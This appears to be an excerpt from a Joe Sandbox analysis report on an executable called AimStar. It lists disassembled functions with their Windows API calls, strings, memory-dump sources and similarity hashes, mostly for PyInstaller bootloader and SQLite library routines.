String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$misuse
API String ID: 2830847230-3538577999
Opcode ID: d25a55683a96beec84c6543246d2a53d95b184e2f538a83d7643ec1d3a9207f3
Instruction ID: 8dd77d91034763d3ac465e36e1c61142361fcc78712a713a6f0f399ff35f99a7
Opcode Fuzzy Hash: d25a55683a96beec84c6543246d2a53d95b184e2f538a83d7643ec1d3a9207f3
Instruction Fuzzy Hash: 3E51AB22F8FA92A5FB549B5198143B86392EF81BD0F484131CE5D077C5DF3CE8828368

Function 00007FF710F4DD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF710F4DFEA,?,?,?,00007FF710F4DCDC,?,?,?,00007FF710F4D8D9), ref: 00007FF710F4DDBD
GetLastError.KERNEL32(?,?,?,00007FF710F4DFEA,?,?,?,00007FF710F4DCDC,?,?,?,00007FF710F4D8D9), ref: 00007FF710F4DDCB
LoadLibraryExW.KERNEL32(?,?,?,00007FF710F4DFEA,?,?,?,00007FF710F4DCDC,?,?,?,00007FF710F4D8D9), ref: 00007FF710F4DDF5
FreeLibrary.KERNEL32(?,?,?,00007FF710F4DFEA,?,?,?,00007FF710F4DCDC,?,?,?,00007FF710F4D8D9), ref: 00007FF710F4DE63
GetProcAddress.KERNEL32(?,?,?,00007FF710F4DFEA,?,?,?,00007FF710F4DCDC,?,?,?,00007FF710F4D8D9), ref: 00007FF710F4DE6F

Strings

api-ms-, xrefs: 00007FF710F4DDDD

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction ID: 853c3a26a537e7d2465522cde10f4a0b5f18e21b3eef837394acedc0993c0b6b
Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction Fuzzy Hash: D7316031B1EE4291EE12BB16A802965B39CBF58BB0F994535ED1D8B384DF3CF449C224

Function 00007FF710F42A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF710F4351A,?,00000000,00007FF710F43F23), ref: 00007FF710F42AA0

Strings

0, xrefs: 00007FF710F42B16
Warning [ANSI Fallback], xrefs: 00007FF710F42B0F
[PYI-%d:%s] , xrefs: 00007FF710F42AA8
WARNING, xrefs: 00007FF710F42AAF
Warning, xrefs: 00007FF710F42B1E

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction ID: 0f0f0d5a9249bc98915b7cc3474f4b9a530fc357db95e0eb6dc3a63627fc87c9
Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction Fuzzy Hash: 3A21713261CB8152E660AB51B8427E6B398BB88794F800132EE8C93759DF3CE249C750

Function 00007FF710F48760 Relevance: 10.6, APIs: 7, Instructions: 63COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF710F48780
OpenProcessToken.ADVAPI32 ref: 00007FF710F48793
GetTokenInformation.ADVAPI32 ref: 00007FF710F487B8
GetLastError.KERNEL32 ref: 00007FF710F487C2
GetTokenInformation.ADVAPI32 ref: 00007FF710F48802
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF710F4881E
CloseHandle.KERNEL32 ref: 00007FF710F48836

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: 960e55689f8153c2b27b80b9ea7c16c7327bf886aabdd5ec5ebc892c06a11a30
Instruction ID: 4cb4539ae922a3e53de7249358d85fd9cb5074120d151f59e427136b93f93a90
Opcode Fuzzy Hash: 960e55689f8153c2b27b80b9ea7c16c7327bf886aabdd5ec5ebc892c06a11a30
Instruction Fuzzy Hash: 14217531A0CE4642EB10AB59F45166EE7A8FB857B0F900235EA6C837E4DE6CF449C710

Function 00007FF710F5B1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF710F5B1CF
FlsGetValue.KERNEL32 ref: 00007FF710F5B1E4
FlsSetValue.KERNEL32 ref: 00007FF710F5B205
FlsSetValue.KERNEL32 ref: 00007FF710F5B232
FlsSetValue.KERNEL32 ref: 00007FF710F5B243
FlsSetValue.KERNEL32 ref: 00007FF710F5B254
SetLastError.KERNEL32 ref: 00007FF710F5B26F

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
Instruction ID: ec8c900ca757510be56ef085bbb0fbb0c40bb3f20410fca852bcff1081ca1fb1
Opcode Fuzzy Hash: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
Instruction Fuzzy Hash: D9218920E0CE0A42FA69B761565713DE16A4F487B0FC44234E93E46BD6DE2CB608C731

Function 00007FF710F67DDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF710F67E0D
GetLastError.KERNEL32 ref: 00007FF710F67E19
CloseHandle.KERNEL32 ref: 00007FF710F67E31
CreateFileW.KERNEL32 ref: 00007FF710F67E5C
WriteConsoleW.KERNEL32 ref: 00007FF710F67E7B

Strings

CONOUT$, xrefs: 00007FF710F67E3D

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction ID: 732320e3b8c495d97d97ede59262e3ee1c6437d447202657a45c83e13bf318aa
Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction Fuzzy Hash: 7311842561CF4586E351AB52E85A329F3A8FB98BF4F400234E95D87794DF7CE848C750

Function 00007FF8A87EEE60 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 390COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A87EEF06

Strings

vtable constructor called recursively: %s, xrefs: 00007FF8A87EF032
hidden, xrefs: 00007FF8A87EF2FD
vtable constructor did not declare schema: %s, xrefs: 00007FF8A87EF1B8
vtable constructor failed: %s, xrefs: 00007FF8A87EF079

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: hidden$vtable constructor called recursively: %s$vtable constructor did not declare schema: %s$vtable constructor failed: %s
API String ID: 2830847230-1299490920
Opcode ID: 8e630c645816d975f518878cd955397d3cf89de65cacaaa3ad1208967ec55729
Instruction ID: e80f43212ad6072aa137adc3874dacc9b99f48bb7fa4231ee688441f3129bc52
Opcode Fuzzy Hash: 8e630c645816d975f518878cd955397d3cf89de65cacaaa3ad1208967ec55729
Instruction Fuzzy Hash: A202EC72A0AB86A2EB548B21E44037E77A5FB85BD4F044272DE9D07B95EF3CE441C324

Function 00007FF710F48560 Relevance: 9.1, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF710F49216), ref: 00007FF710F48592
K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF710F49216), ref: 00007FF710F485E9

Part of subcall function 00007FF710F49400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF710F445E4,00000000,00007FF710F41985), ref: 00007FF710F49439

K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF710F49216), ref: 00007FF710F48678
K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF710F49216), ref: 00007FF710F486E4
FreeLibrary.KERNEL32(?,?,00000000,00007FF710F49216), ref: 00007FF710F486F5
FreeLibrary.KERNEL32(?,?,00000000,00007FF710F49216), ref: 00007FF710F4870A

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: af5051bae1bb50e3ccf69b50d5ac14561a54b739df452b641c0904f08e36c6c8
Instruction ID: 899c541852678944eeb4ddca8fe1334a2deef6c816ae896d4c09df081b2c4361
Opcode Fuzzy Hash: af5051bae1bb50e3ccf69b50d5ac14561a54b739df452b641c0904f08e36c6c8
Instruction Fuzzy Hash: 2441B732B1DA8641E670AB11A552AAEA398FF44BE4F850035DF4D97789DF3CF50AC720

Function 00007FF8A877C090 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 366COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A877C1DD
00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A877C337

Strings

database corruption, xrefs: 00007FF8A877C190, 00007FF8A877C2D7
%s at line %d of [%.10s], xrefs: 00007FF8A877C19C, 00007FF8A877C2E3
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FF8A877C183, 00007FF8A877C2CA

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 2830847230-3727861699
Opcode ID: 8c52ddcc36590edf680ba46134fdbbf73a088618ff38eaf43da130e1a75dd050
Instruction ID: f65c0a14cc34836c27c8fb1ebed8279a91000b9efc81796948e7c9f6e5838e42
Opcode Fuzzy Hash: 8c52ddcc36590edf680ba46134fdbbf73a088618ff38eaf43da130e1a75dd050
Instruction Fuzzy Hash: 94F19A7260AB8196DB90CF19E4407AE77A4FB89BD4F108036EE8E43795DF39D884C714

Function 00007FF710F490E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF710F48760: GetCurrentProcess.KERNEL32 ref: 00007FF710F48780
Part of subcall function 00007FF710F48760: OpenProcessToken.ADVAPI32 ref: 00007FF710F48793
Part of subcall function 00007FF710F48760: GetTokenInformation.ADVAPI32 ref: 00007FF710F487B8
Part of subcall function 00007FF710F48760: GetLastError.KERNEL32 ref: 00007FF710F487C2
Part of subcall function 00007FF710F48760: GetTokenInformation.ADVAPI32 ref: 00007FF710F48802
Part of subcall function 00007FF710F48760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF710F4881E
Part of subcall function 00007FF710F48760: CloseHandle.KERNEL32 ref: 00007FF710F48836

LocalFree.KERNEL32(?,00007FF710F43C55), ref: 00007FF710F4916C
LocalFree.KERNEL32(?,00007FF710F43C55), ref: 00007FF710F49175

Strings

D:(A;;FA;;;%s), xrefs: 00007FF710F49157
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF710F49142
S-1-3-4, xrefs: 00007FF710F49121
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF710F49183

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
Instruction ID: 532235cf7e9e6ed5e2707603178fabec15aacca371d74e7af265ef332ab54cfd
Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
Instruction Fuzzy Hash: 09214C35A0CE4241E650BB10E9166EAA3A8EB897A0FC40031EE4D93796DF3CF849C760

Function 00007FF8A8775660 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A8775A15
00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A8775A2A

Strings

database corruption, xrefs: 00007FF8A87756B1
%s at line %d of [%.10s], xrefs: 00007FF8A87756BD
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FF8A87756A5

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 2830847230-3727861699
Opcode ID: 3655e22da9e07da38f3769848262744f944a14fbb408cd692dcf19944dac75b3
Instruction ID: 5f8d26c340d54c67f8f86a890aec9dcfccba13f3be1808187526c51ba56540f8
Opcode Fuzzy Hash: 3655e22da9e07da38f3769848262744f944a14fbb408cd692dcf19944dac75b3
Instruction Fuzzy Hash: 40D1CE72B0A78596EB60CF29E0807A9B7A5FB84B84F564032DE4D47798EF3CD841CB54

Function 00007FF710F5B338 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF710F54F81,?,?,?,?,00007FF710F5A4FA,?,?,?,?,00007FF710F571FF), ref: 00007FF710F5B347
FlsSetValue.KERNEL32(?,?,?,00007FF710F54F81,?,?,?,?,00007FF710F5A4FA,?,?,?,?,00007FF710F571FF), ref: 00007FF710F5B37D
FlsSetValue.KERNEL32(?,?,?,00007FF710F54F81,?,?,?,?,00007FF710F5A4FA,?,?,?,?,00007FF710F571FF), ref: 00007FF710F5B3AA
FlsSetValue.KERNEL32(?,?,?,00007FF710F54F81,?,?,?,?,00007FF710F5A4FA,?,?,?,?,00007FF710F571FF), ref: 00007FF710F5B3BB
FlsSetValue.KERNEL32(?,?,?,00007FF710F54F81,?,?,?,?,00007FF710F5A4FA,?,?,?,?,00007FF710F571FF), ref: 00007FF710F5B3CC
SetLastError.KERNEL32(?,?,?,00007FF710F54F81,?,?,?,?,00007FF710F5A4FA,?,?,?,?,00007FF710F571FF), ref: 00007FF710F5B3E7

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
Instruction ID: 7b2d6a4d612f110421e969019983c97df14bb56d209800f702c30a659077b510
Opcode Fuzzy Hash: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
Instruction Fuzzy Hash: 36118C20A0CE4A82FA54B721565713DE2AA5F487B0FC44334E82E567C6DE2CB60DC721

Function 00007FF8A87A8CA0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 299COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A87A8EBD
00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A87A8F8C
00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A87A908C

Strings

"%w" , xrefs: 00007FF8A87A8D4B
%Q%s, xrefs: 00007FF8A87A8FF2

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: "%w" $%Q%s
API String ID: 2830847230-1987291987
Opcode ID: 4996da17ddfec1dee6660f65e02a5f8beeb701232fff484e3028168577d632cb
Instruction ID: 5ec4e86be49ceef33c3666e66b0684f18cd76ceb36fcdf2c03df8f30bddddc3c
Opcode Fuzzy Hash: 4996da17ddfec1dee6660f65e02a5f8beeb701232fff484e3028168577d632cb
Instruction Fuzzy Hash: 67C1E322B4AB82A6EA14CF15A44037AA7A1FB85BE0F144235DE6E077D5DF3CE461C724

Function 00007FF8A87710D0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 253COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A87713A7
00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A8771415

Strings

database corruption, xrefs: 00007FF8A877115E
%s at line %d of [%.10s], xrefs: 00007FF8A877116A
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FF8A8771152

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 2830847230-3727861699
Opcode ID: 071cd9badcc09f2493c72e810cc68969e4bc8f5cc32b795679ffd7b93dfb2617
Instruction ID: a498c55e849a93a45b88a165f352d18e6a26fd447fd1ad98cab9aaa91f1cc09e
Opcode Fuzzy Hash: 071cd9badcc09f2493c72e810cc68969e4bc8f5cc32b795679ffd7b93dfb2617
Instruction Fuzzy Hash: B3A1B062B0E2D1A6D7648B1994907BE7BA2FB807C0F054236DBCA83681EF3CE555C734

Function 00007FF8A87A7D30 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 215COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A87A7F3E
00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A87A7FA9

Strings

sqlite_altertab_%s, xrefs: 00007FF8A87A7EFD
virtual tables may not be altered, xrefs: 00007FF8A87A7DC8
Cannot add a column to a view, xrefs: 00007FF8A87A7DE4

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
API String ID: 2830847230-2063813899
Opcode ID: cb70008a6c27e64156325b5e7a2a9a0bb04b816a8d25a30ecc8672c31da071fa
Instruction ID: a493c4fbd6e85cb4b05d8dd92b03d414209075cf8db0efbeb2a189b61c36a04a
Opcode Fuzzy Hash: cb70008a6c27e64156325b5e7a2a9a0bb04b816a8d25a30ecc8672c31da071fa
Instruction Fuzzy Hash: F7912162A0AB8596EB60CF12D4502BAB7A1FB88BC0F459235DF9D07785EF3CE451C324

